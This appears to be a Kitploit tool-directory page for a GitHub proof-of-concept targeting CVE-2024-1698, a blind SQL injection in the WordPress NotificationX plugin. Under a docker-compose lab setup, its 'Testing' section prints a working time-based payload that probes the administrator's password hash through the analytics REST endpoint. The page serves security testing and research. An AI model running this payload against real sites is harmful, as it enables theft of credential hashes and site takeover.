Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
WordPress-NotificationX-CVE-2024-1698 — Proof-of-concept exploit for CVE-2024-1698, a blind SQL injection vulnerability in the WordPress NotificationX plugin, enabling time-based data extraction from the database. | Kitploit
Tools/GitHubGitHub/jesicatjan/wordpress-notificationx-cve-2024-1698
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjesicatjan/wordpress-notificationx-cve-2024-1698

WordPress-NotificationX-CVE-2024-1698

Proof-of-concept exploit for CVE-2024-1698, a blind SQL injection vulnerability in the WordPress NotificationX plugin, enabling time-based data extraction from the database.

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Set-up

root@kitploit:~
docker-compose up --build

Clean up

root@kitploit:~
docker-compose down

Testing

root@kitploit:~
Measure-Command {
    curl.exe http://localhost/wp-json/notificationx/v1/analytics `
        -Method Post `
        -Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}
Download Tool